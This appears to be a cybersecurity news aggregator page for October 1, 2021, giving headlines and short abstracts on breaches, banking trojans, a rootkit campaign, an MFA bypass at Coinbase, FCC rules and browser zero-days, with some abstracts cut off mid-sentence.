MFA Glitch Leads to 6K+ Coinbase Customers Getting Robbed Full Text
Abstract
Coinbase suspects phishing led to attackers getting personal details needed to access wallets but also blamed a flaw in its SMS-based 2FA.Threatpost
October 01, 2021 – Government
US unites 30 countries to disrupt global ransomware attacks Full Text
Abstract
U.S. President Joe Biden said today announced today that the U.S. has brought together 30 countries to jointly crackdown on ransomware gangs behind a barrage of attacks impacting organizations worldwide.BleepingComputer
October 01, 2021 – Breach
Neiman Marcus notifying 4.6M customers of data breach Full Text
Abstract
Department store Neiman Marcus announced Friday that it was in the process of notifying 4.6 million online customers that some of their data had been compromised as part of a data breach that took place last year.The Hill
October 01, 2021 – Hacker
Chinese Hackers Used a New Rootkit to Spy on Targeted Windows 10 Users Full Text
Abstract
A formerly unknown Chinese-speaking threat actor has been linked to a long-standing evasive operation aimed at South East Asian targets as far back as July 2020 to deploy a kernel-mode rootkit on compromised Windows systems. Attacks mounted by the hacking group, dubbed GhostEmperor by Kaspersky, are also said to have used a "sophisticated multi-stage malware framework" that allows for providing persistence and remote control over the targeted hosts. The Russian cybersecurity firm called the rootkit Demodex , with infections reported across several high-profile entities in Malaysia, Thailand, Vietnam, and Indonesia, in addition to outliers located in Egypt, Ethiopia, and Afghanistan. "[Demodex] is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting undocumented loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver SigThe Hacker News
October 01, 2021 – Government
FCC orders phone carriers to enforce unlawful robocall blocking Full Text
Abstract
The Federal Communications Commission (FCC) announced earlier this week that phone companies are now required to filter calls from providers who haven't complied with a deadline to block illegal robocalls that expired on September 28th.BleepingComputer
October 1, 2021 – Attack
Baby died at Alabama Springhill Medical Center due to cyber attack Full Text
Abstract
A baby allegedly received inadequate childbirth health care, and later died, at an Alabama Springhill Medical Center due to a ransomware attack. An Alabama woman named Teiranni Kidd has filed suit after the death of her baby, she claims that the Springhill...Security Affairs
October 01, 2021 – Cryptocurrency
Crypto platform mistakenly gives $90M to users, asks for refund Full Text
Abstract
In a major blunder, cryptocurrency platform Compound accidentally paid out $90 million among its users. Shortly after the mistake, the platform's founder began asking users to return the money—or else they would be reported to IRS, and possibly doxxed, threatened the founder.BleepingComputer
October 1, 2021 – Malware
Hydra Android trojan campaign targets customers of European banks Full Text
Abstract
Experts warn of a new Hydra banking trojan campaign targeting European e-banking platform users, including the customers of Commerzbank. Experts warn of a malware campaign targeting European e-banking platform users with the Hydra banking trojan....Security Affairs
October 01, 2021 – Attack
MoneyLion locks customer accounts after credential stuffing attacks Full Text
Abstract
The banking and investing platform MoneyLion had to lock customer accounts that were breached in credential stuffing attacks over the summer, in June and July.BleepingComputer
October 1, 2021 – Attack
Hydra Android Trojan Campaign Targets Customers of Commerzbank and other European Banks Full Text
Abstract
Threat actors set up a page posing as the official CommerzBank page and registered multiple domains on the same IP address. Crooks used the fake website to spread fake CommerzBank apps.Security Affairs
October 1, 2021 – Breach
Neiman Marcus discloses data breach, payment card data exposed Full Text
Abstract
Luxury retail company Neiman Marcus Group has announced this week that it has suffered a data breach that impacted customer information. The attack against Neiman Marcus Group took place in May 2020, as a result of the attack, threat actors had access...Security Affairs
October 01, 2021 – Business
Neiman Marcus sends notices of breach to 4.3 million customers Full Text
Abstract
Neiman Marcus, the Texas-based luxury department stores chain, is sending notices of a data breach to roughly 4.3 million customers.BleepingComputer
October 1, 2021 – Government
CISA Releases New Tool to Help Organizations Guard Against Insider Threats Full Text
Abstract
The CISA released an Insider Risk Mitigation Self-Assessment Tool today, which assists public and private sector organizations in assessing their vulnerability to an insider threat.US CERT
October 1, 2021 – Vulnerabilities
Google fixes 2 new actively exploited zero-day flaws in Chrome Full Text
Abstract
Google rolled out urgent security updates to address two new actively exploited zero-day vulnerabilities in its Chrome browser. Google this week rolled out urgent security updates for the Chrome browser to address four security flaws, including two new zero-day...Security Affairs
October 01, 2021 – Government
The FCC proposes rules to fight SIM swap and port-out fraud Full Text
Abstract
The Federal Communications Commission in the U.S. this week announced that it started to work on rules that would pull the brake on SIM swapping attacks.BleepingComputer
October 01, 2021 – Cryptocurrency
Hackers rob thousands of Coinbase customers using MFA flaw Full Text
Abstract
Crypto exchange Coinbase disclosed that a threat actor stole cryptocurrency from 6,000 customers after using a vulnerability to bypass the company's SMS multi-factor authentication security feature.BleepingComputer
October 01, 2021 – Malware
Flubot Android malware now spreads via fake security updates Full Text
Abstract
The Flubot malware has switched to a new and likely more effective lure to compromise Android devices, now trying to trick its victims into infecting themselves with the help of fake security updates warning them of Flubot infections.BleepingComputer
October 01, 2021 – Malware
Hydra malware targets customers of Germany’s second largest bank Full Text
Abstract
The Hydra banking trojan is back to targeting European e-banking platform users, and more specifically, customers of Commerzbank, Germany's second-largest financial institution.BleepingComputer
October 1, 2021 – Government
Around the world with the NSA’s cyber chief Full Text
Abstract
“Almost every nation in the world now has a cyber exploitation program,” Rob Joyce, director of the NSA’s Cybersecurity Directorate, said during the Aspen Cyber Summit in Colorado.The Record
October 01, 2021 – Malware
Beware of Fake Amnesty International Antivirus for Pegasus that Hacks PCs with Malware Full Text
Abstract
In yet another indicator of how hacking groups are quick to capitalize on world events and improvise their attack campaigns for maximum impact, threat actors have been discovered impersonating Amnesty International to distribute malware that purports to be security software designed to safeguard against NSO Group's Pegasus surveillanceware. "Adversaries have set up a phony website that looks like Amnesty International's — a human rights-focused non-governmental organization — and points to a promised antivirus tool to protect against the NSO Group's Pegasus tool," Cisco Talos researchers said . "However, the download actually installs the little-known Sarwent malware." The countries most affected by the campaign include the U.K., the U.S., Russia, India, Ukraine, Czech Republic, Romania, and Colombia. While it's unclear as to how the victims are lured into visiting the fake Amnesty International website, the cybersecurity firm surmised the attaThe Hacker News
October 1, 2021 – Phishing
Weaponizing Apple AirTag to lure users to malicious sites Full Text
Abstract
Threat actors could exploit a stored cross-site scripting (XSS) vulnerability in Apple AirTag product to lure users to malicious websites. Security researcher Bobby Rauch discovered a stored cross-site scripting (XSS) vulnerability in the Apple AirTag...Security Affairs
October 1, 2021 – Vulnerabilities
Report highlights cybersecurity dangers of Elastic Stack implementation mistakes Full Text
Abstract
Researchers from cybersecurity firm Salt Security discovered widespread mistakes that allowed them to launch attacks where any user could extract sensitive customer and system data.ZDNet
October 1, 2021 – Privacy
‘Stalkerware’ Apps Are Proliferating. Protect Yourself. Full Text
Abstract
While these apps numbered in the hundreds a few years ago, they have since grown into the thousands. They are widely available on Google’s Play Store and to a lesser degree on Apple’s App Store.New York Times